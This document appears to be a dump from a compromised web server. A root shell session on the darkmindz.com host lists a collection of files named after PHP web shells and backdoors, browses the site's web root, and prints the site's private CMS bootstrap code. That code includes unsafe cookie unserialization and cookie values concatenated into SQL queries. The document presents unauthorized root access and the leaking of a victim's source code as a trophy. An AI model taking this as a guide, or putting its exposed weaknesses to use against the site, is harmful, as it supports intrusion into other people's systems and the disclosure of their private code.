+-rw-r--r--  1 romeo romeo  40682 Feb 16 21:06 CrystalShell v.1.txt
+-rw-r--r--  1 romeo romeo  83029 Feb 16 21:06 CyberSpy5.txt
+-rw-r--r--  1 romeo romeo  43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
+-rw-r--r--  1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
+-rw-r--r--  1 romeo romeo  39433 Feb 16 21:06 eko.txt
+-rw-r--r--  1 romeo romeo  38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
+-rw-r--r--  1 romeo romeo  24829 Feb 16 21:06 GFS web-shell ver 3.1.7 -
+PRiV8.txt
+-rw-r--r--  1 romeo romeo   2089 Feb 16 21:06 imageshell.JPG
+-rw-r--r--  1 romeo romeo   1768 Feb 16 21:06 index.php
+-rw-r--r--  1 romeo romeo  17440 Feb 16 21:06 kscript.txt
+-rw-r--r--  1 romeo romeo   2342 Feb 16 21:06 l0ger.txt
+-rw-r--r--  1 romeo romeo   1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
+-rw-r--r--  1 romeo romeo  33796 Feb 16 21:06 Mysql interface v1.0.txt
+-rw-r--r--  1 romeo romeo  34398 Feb 16 21:06 mysql.txt
+-rw-r--r--  1 romeo romeo  38856 Feb 16 21:06 ntdaddy.txt
+-rw-r--r--  1 romeo romeo 124953 Feb 16 21:06 r57.txt
+-rw-r--r--  1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
+-rw-r--r--  1 romeo romeo   7002 Feb 16 21:06 steg.txt
+-rw-r--r--  1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
+-rw-r--r--  1 romeo romeo  70402 Feb 16 21:06 webadmin.txt
+-rw-r--r--  1 romeo romeo   5057 Feb 16 21:06 WinX Shell.txt
+-rw-r--r--  1 romeo romeo   2455 Feb 16 21:06 Worse Linux Shell.txt
+-rw-r--r--  1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
+-rw-r--r--  1 romeo romeo  10418 Feb 16 21:06 XSSscan.py.txt
+-rw-r--r--  1 romeo romeo  10269 Feb 16 21:06 xx.txt
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# #ELEET
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -al
+total 47264
+drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
+drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
+-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
+-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
+-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
+drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
+drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
+-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
+-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
+-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
+drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
+-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
+-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
+-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
+-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
+-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
+-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
+-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
+-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
+drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
+-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
+-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
+drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
+-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
+-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
+-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
+-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
+-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
+drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
+-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
+-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
+-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
+-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
+-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
+-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
+-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
+-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
+drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
+-rw-r--r--  1 romeo romeo 46488303 May 23 04:08 stress_test.txt
+-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
+drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
+-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
+drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
+-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
+-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
+-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
+-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
+-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
+-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
+-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
+-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# cat test.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -la
+total 47264
+drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
+drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
+-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
+-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
+-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
+drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
+drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
+-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
+-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
+-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
+drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
+-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
+-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
+-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
+-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
+-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
+-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
+-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
+-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
+drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
+-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
+-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
+drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
+-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
+-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
+-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
+-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
+-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
+drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
+-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
+-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
+-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
+-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
+-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
+-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
+-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
+-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
+drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
+-rw-r--r--  1 romeo romeo 46488756 May 23 04:08 stress_test.txt
+-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
+drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
+-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
+drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
+-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
+-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
+-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
+-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
+-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
+-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
+-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
+-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# less ucp.php
+is_online){redirect("/".root()."index.php");}
+
+$mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
+$auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
+$switch = isset($_GET['action']) ? $_GET['action'] : '';
+
+$uid = $config['global']['user']['id'];
+if((int)isset($_GET['uid']) &&
+$_user->check_permissions($config['global']['user
+']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
+    $uid = (int)$_GET['uid'];
+}else{
+    $uid = $config['global']['user']['id'];
+ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# cd core
+root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
+core]# ls -al
+total 164
+drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 .
+drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 ..
+-rw-r--r--  1 romeo romeo   731 Jan 13 07:34 admin.js
+-rw-r--r--  1 romeo romeo 27395 Feb 18 09:08 base_functions.php
+-rw-r--r--  1 romeo romeo  9098 Feb 21 10:50 bbcode_tags.php
+-rw-r--r--  1 romeo romeo  2816 Feb  1 08:55 cacher.php
+drwxr-xr-x  4 romeo romeo  4096 Feb 10 13:29 classes
+-rw-r--r--  1 romeo romeo  1436 Feb  2 08:33 cli.php
+-rw-r--r--  1 romeo romeo  2848 Feb  8 08:46 config.php
+-rw-r--r--  1 romeo romeo 23810 Apr 19 16:45 core.php
+-rw-r--r--  1 romeo romeo  4518 Feb  1 08:55 cron.php
+drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 err
+-rw-r--r--  1 romeo romeo   236 Feb  2 08:33 force_user.php
+drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 functions
+-rw-r--r--  1 romeo romeo  1181 Feb  2 08:33 key.php
+-rw-r--r--  1 romeo romeo  6903 Feb  2 08:33 mailer.php
+drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 mint
+-rw-r--r--  1 romeo romeo  3054 Feb 14 06:17 page_footer.php
+-rw-r--r--  1 romeo romeo  5935 Feb 14 06:17 page_header.php
+-rw-r--r--  1 romeo romeo  9762 Feb  2 08:33 recaptchalib.php
+-rw-r--r--  1 romeo romeo  6658 Apr 26 07:51 security.php
+-rw-r--r--  1 romeo romeo  2021 Feb  2 08:33 usertracker.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
+core]# cat config.php
+config = $config;
+if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
+if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
+
+
+//Open the session stuff
+$_sess->sql = $_sql;
+$_sess->config = $config;
+
+//start the form class
+$_form = new form;
+
+//start the user class
+$_user = new user;
+$_user->config = $config;
+$_user->sql = $_sql;
+
+
+//start the login
+$_login = new login((isset($config['site']['autologin']) ? true : false));
+$_login->config = $config;
+$_login->sql = $_sql;
+$_login->form = $_form;
+$_login->sess = $_sess;
+$_login->user = $_user;
+$_user->login = $_login;
+
+//require($cms_root."core/key.php");
+
+//start the time class
+$_time = new time;
+$_time->config = $config;
+
+//start the bbcode class
+$_bbcode = new bbcode;
+$_bbcode->SetDebug(true);
+$_bbcode->SetDetectURLs(false);
+$_bbcode->SetURLPattern('{$text/h} External Link');
+$_bbcode->ClearSmileys();
+$_bbcode->SetSmileyDir('/'.root().'images/smilies');
+include($cms_root."core/bbcode_tags.php");
+
+$_bbcode->user = $_user;
+$_user->bbcode = $_bbcode;
+
+//start the cache && template classes
+$_cache_path = $cms_root."cache/";
+if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
+$_cache_ = (is_writable($_cache_path) ? true : false);
+$_cache = new Cache($_sql, $_cache_path, $_cache_);
+$_cache->config = $config['db'];
+
+//regenerate the site cache
+if($config!==NULL || !empty($config)){
+    $config_db = $_cache->generate_cache("config_db", "cache_config.php",
+"SELECT * FROM ".$config['db']['prefix']."config");
+    foreach($config_db as $array){
+	$config[$array['array']][$array['var']] = $array['value'];
+    }
+    unset($array,$config_db);
+}
+
+//start the template class
+$_template = new template('.', $_cache_, $_cache_path."files/");
+$_template->cms_root = $cms_root;
+$_template->user = $_user;
+
+$_login->template = $_template;
+
+//start the language class
+$_language = $config['site']['language'];
+if(isset($_SESSION['user']['language'])){
+   
+if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")
+){
+	$_language = $_SESSION['user']['language'];
+    }
+}
+require($cms_root."language/".$_language."/main.php");
+$_time->cur_lang = $_language;
+
+//run the lang pass function on the language vars AFTER we included the base
+functions.
+foreach($_lang as $key => $value){
+	if(!is_array($_lang[$key])){
+		$_lang[$key] = lang_pass($_lang[$key]);
+	}
+}
+
+$_time->lang = $_lang;
+$_bbcode->lang = $_lang;
+$_login->lang = $_lang;
+//Include the security files.. recaptchalib maybe add into the login class
+require($cms_root."core/security.php");
+
+require($cms_root."core/classes/class.captcha.php");
+$_captcha = new Captcha($config['site']['captcha_pub'],
+$config['site']['captcha_priv']);
+
+$_cms_root = $cms_root;
+//Include the mailer
+require($cms_root."core/mailer.php");
+$cms_root = $_cms_root;
+
+/////////////////////////////////////////////////////////////////////////////
+//--Continue with the configuration----------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+define('ADMIN',     9);
+define('DEV',	    8);
+define('GMOD',	    7);
+define('MOD',	    5);
+define('USER',	    1);
+define('BANNED',    0);
+
+//add some stuff to the config
+
+//generate guest defaults
+$guest['user']['id'] = '0';
+$guest['user']['username'] = 'Guest';
+$guest['user']['theme'] = $config['site']['theme'];
+$guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
+$_SESSION['user']['userkey'] : NULL;
+
+//generate user stuff
+$config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
+: $guest['user']);
+$config['global']['ip'] = getIP();
+$config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
+$_SERVER['HTTP_USER_AGENT'] : NULL);
+$config['site']['guests_online'] = (isset($guests_online) &&
+is_numeric($guests_online) ? $guests_online : 0);
+$config['site']['users_online'] = (isset($_users_online) &&
+is_numeric($_users_online) ? $_users_online : 0);
+$_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
+: false;
+
+#if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}
+
+$tpl = $config['site']['theme'];
+if($config['site']['template_override']){
+    if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
+}else{
+	if(isset($config['global']['user']['template']) &&
+is_dir($cms_root."template/".$config['global']['user']['template']."/")){
+		$tpl = $config['global']['user']['template'];
+	}
+}
+$_template->config = $config;
+$_template->tpl = $tpl;
+
+//None of these should be defined as vars as they can be over writtin.. They
+are defines
+$_module = (is_string(isset($_GET['module'])) ? $_GET['module'] :
+$config['site']['default_module']);
+$_user_temp = $cms_root."template/".$tpl."/";
+$_module_temp = $cms_root."modules/".$_module."/template/";
+
+if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
+	unset($_SESSION['login']);
+}
+
+$_template->set_rootdir($cms_root);
+
+define('IS_MOD',    $_user->check_permissions($config['global']['user']['id'],
+MOD));
+define('IS_GMOD',   $_user->check_permissions($config['global']['user']['id'],
+GMOD));
+define('IS_DEV',    $_user->check_permissions($config['global']['user']['id'],
+DEV));
+define('IS_ADMIN',  $_user->check_permissions($config['global']['user']['id'],
+ADMIN));
+
+/////////////////////////////////////////////////////////////////////////////
+//--Grab the neccesarry cache files----------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+//this defines which of the cache files to include
+//require($cms_root.'core/cacher.php');
+
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--Cacher.php-------------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+$cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans',
+'user_permissions', NULL);#'badwords', 'affiliates',
+$x=0;
+include($cms_root."cache/cache.php");
+while($var = $cache_gen[$x]){
+    if($var != ''){
+	$gen = NULL;
+	    eval('$gen = $'.$var.'_db;');
+
+	    /*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
+		include($cms_root."cache/cache_".$var.".php");
+		eval('$gen = $'.$var.'_db;');
+		}*/
+		if ($gen !== NULL || !empty($gen)){
+			foreach($gen as $k => $v){
+		    $config[$var][$k] = $v;
+		}
+		}else{
+		//regenerate the cache if not avalible
+		    switch($var){
+		    case 'config':
+			$config[$var] = $_cache->generate_cache("config_db",
+"cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
+		    break;
+		    case 'minimenu':
+			$config[$var] = $_cache->generate_cache("minimenu_db",
+"cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY
+disporder ASC");
+		    break;
+
+		    case 'menu':
+			$config[$var] = $_cache->generate_cache("menu_db",
+"cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id
+ASC", NNUM);
+:
+		    break;
+
+		    case 'statistics':
+			$config[$var] = $_cache->generate_statistics_cache();
+		    break;
+
+		    case 'groups':
+			$config[$var] = $_cache->generate_cache("groups_db",
+"cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY
+rank DESC");
+		    break;
+		    case 'bans':
+			$config[$var] = $_cache->generate_cache("bans_db",
+"cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
+		    break;
+		    //case 'affiliates':
+		    //	  $config[$var] =
+$_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM
+".$config['db']['prefix']."affiliates");
+		    //break;
+		    //case 'module_permissions':
+		    //	  $config[$var] =
+$_cache->generate_cache("module_permissions_db",
+"cache_module_permissions.php", "SELECT * FROM
+".$config['db']['prefix']."module_permissions");
+		    //break;
+		    case 'user_permissions':
+			$config[$var] = $_cache->generate_upermissions_cache();
+
+		    break;
+		}
+
+	}
+	}
+	$x++;
+}
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--Cacher.php-------------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+
+
+$_user->groups = $config['groups'];
+//$_user->module_permissions = $config['module_permissions'];
+$_user->permissions = $config['user_permissions'];
+
+/////////////////////////////////////////////////////////////////////////////
+//--Cron - This will sort the majority of the cache and--------------------//
+//---------db problems out for us------------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+
+//include($cms_root.'core/cron.php');
+
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--Cron.php---------------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+
+if(!defined('NO_DB')){
+    $hourly_cron = FALSE;
+    if(isset($config['site']['hourly_time'])){
+	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
+		$_sql->updateRow("statistics", array('value' => time()),
+"variable = 'hourly_cron'");
+		$hourly_cron = TRUE;
+	} else {
+		if($config['site']['hourly_time'] == 0){
+			$hourly_cron = TRUE;
+		}else{
+			if((time() - $config['site']['hourly_time']) > 
+$config['statistics']['hourly_cron']){
+				$_sql->updateRow("statistics", array('value' =>
+time()), "variable = 'hourly_cron'");
+				$hourly_cron = TRUE;
+			}
+:
+		}
+	}
+    }
+
+    $daily_cron = FALSE;
+    if(isset($config['site']['daily_time'])){
+	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
+		$_sql->updateRow("statistics", array('value' => time()),
+"variable = 'daily_cron'");
+		$daily_cron = TRUE;
+	} else {
+		if($config['site']['daily_time'] == 0){
+			$daily_cron = TRUE;
+		}else{
+			if((time() - $config['site']['daily_time']) > 
+$config['statistics']['daily_cron']){
+				$_sql->updateRow("statistics", array('value' =>
+time()), "variable = 'daily_cron'");
+				$daily_cron = TRUE;
+			}
+		}
+	}
+    }
+
+    $weekly_cron = FALSE;
+    if(isset($config['site']['weekly_time'])){
+	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
+		$_sql->updateRow("statistics", array('value' => time()),
+"variable = 'weekly_cron'");
+		$weekly_cron = TRUE;
+	} else {
+		if($config['site']['weekly_time'] == 0){
+			$weekly_cron = TRUE;
+		}else{
+			if((time() - $config['site']['weekly_time']) > 
+$config['statistics']['weekly_cron']){
+				$_sql->updateRow("statistics", array('value' =>
+time()), "variable = 'weekly_cron'");
+				$weekly_cron = TRUE;
+			}
+		}
+	}
+    }
+}
+
+$stat_cache = false;
+if(!defined('NO_DB')){
+	if($hourly_cron){
+	    $_sql->record_message('Hourly CRON is running');
+		//delete users from sql that are inactive and set users offline
+that are inactive too
+		$_sql->query("UPDATE shr_users
+	    SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE
+cs_online.uid = shr_users.id)
+	    WHERE EXISTS
+	      ( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid =
+shr_users.id)");
+		$_sql->deleteRow('online', "login_time <
+".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp <
+".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
+		$_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE
+"66.249%"');
+		$_cache->generate_statistics_cache();
+		$stat_cache = true;
+
+	}
+
+	if($daily_cron){
+	    $_sql->record_message('Daily CRON is running');
+		//update caches
+		if(!$stat_cache){
+		$_cache->generate_statistics_cache();
+		$stat_cache = true;
+:
+	}
+
+	if($config['forum']['auto_lock']){
+	    //Auto Lock Thread Timer
+	    $ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'],
+'', 1);
+	    $_sql->updateRow('forum_topics', array('locked'=>1), "last_poster
+<= $ex", 1);
+	}
+
+	$_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE
+expire < ".time()."");
+
+		$_cache->generate_upermissions_cache();
+	$_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT *
+FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
+		$_cache->generate_cache("menu_db", "cache_menu.php", "SELECT *
+FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
+	    //$_cache->generate_cache("module_permissions_db",
+"cache_module_permissions.php", "SELECT * FROM
+".$config['db']['prefix']."module_permissions");
+
+	}
+
+	if($weekly_cron){
+	    $_sql->record_message('Weekly CRON is running');
+		if(!$stat_cache){
+		$_cache->generate_statistics_cache();
+		$stat_cache = true;
+	}
+
+	$_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM
+".$config['db']['prefix']."config");
+	    $_cache->generate_cache("groups_db", "cache_groups.php", "SELECT *
+FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");
+
+	//Optimise all of the tables in the DB
+		$alltables = $_sql->getTable("SHOW TABLES");
+	    $tables = '';
+	    $counter = count($alltables);
+	    $x = 0;
+	    $add = ", ";
+	    foreach($alltables as $table){
+		foreach ($table as $tablename){
+			if($x == ($counter-1)){
+				$add = '';
+			}
+			$tables .= "`$tablename`$add";
+			$x++;
+		}
+	    }
+	    $_sql->query("OPTIMIZE TABLE $tables");
+	    $_sql->updateRow("statistics", array('value' => time()), "variable
+= 'weekly_time'", FALSE);
+	}
+
+	if($weekly_cron || $daily_cron || $hourly_cron){
+	define('FILE_MERGE', 1);
+	include($cms_root.'merge.php');
+	}
+}
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--Cron.php---------------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+
+/////////////////////////////////////////////////////////////////////////////
+//--Check weather the site is closed---------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
+	if (!$_user->check_permissions($config['global']['user']['id'],
+ADMIN)){
+		die(die_error(4));
+:
+	}
+}
+
+/////////////////////////////////////////////////////////////////////////////
+//--Check weather a user is banned-----------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+/**
+if ($config['bans'] != NULL){
+	foreach ($config['bans'] as $bans){
+		if ($bans['user_ip'] == $config['global']['ip']){
+			die(die_error($bans['die']));
+		}
+	}
+}
+**/
+
+/////////////////////////////////////////////////////////////////////////////
+//--Sort out the guests & users online stuff-------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+
+//include($cms_root.'core/usertracker.php');
+
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--UserTracker.php--------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+if(!defined('NO_DB') && !defined('NO_LOG')){
+
+if(!isset($_SESSION['user']['userkey'])){
+    //cookie check
+    if(!$_user->is_online){
+		if(isset($_COOKIE[$config['db']['ckefix'].'login']) &&
+!empty($_COOKIE[$config['db']['ckefix'].'login'])){
+	    $cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
+	    if(isset($cookie[1]) && (int)isset($cookie[0])){
+			if($cookie[1] ==
+$_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
+			    if($config['login']['autologinIpRestriction']) $aq
+= " AND user_ip = '".getIP()."'";
+			$query = $_sql->getTable("SELECT uid FROM
+".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent
+= '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
+				if (count($query) == 1){
+				    $user = $_sql->getTable("SELECT timestamp
+FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
+				    if($user!==NULL){
+					$user = $user[0];
+					       
+$_sess->set_sessions($cookie[0]);
+
+						$_SESSION['user']['last_visit']
+= $user['timestamp'];
+			    $_user->new_user($cookie[0], 'alogin');
+
+			       
+if($_user->get_new_threads($_SESSION['user']['last_visit']))
+				setNotification('We have just updated your
+forum icons to reflect new posts.', 'Forum Icons Updated', false,
+$_SESSION['user']['id']);
+			    $config['global']['user']['id'] =
+$_SESSION['user']['id'];
+					}
+				}else{//if count query == 1
+				setcookie($config['db']['ckefix']."login",
+null, time() - 31536000);    //set cookie to remember me
+			       
+unset($_COOKIE[$config['db']['ckefix']."login"]);
+		    }
+			}else{ //if cookie == http user agent
+				setcookie($config['db']['ckefix']."login",
+null, time() - 31536000);    //set cookie to remember me
+			       
+unset($_COOKIE[$config['db']['ckefix']."login"]);
+		}
+		}else{//if cookie info == valid
+			setcookie($config['db']['ckefix']."login", null, time()
+- 31536000);	//set cookie to remember me
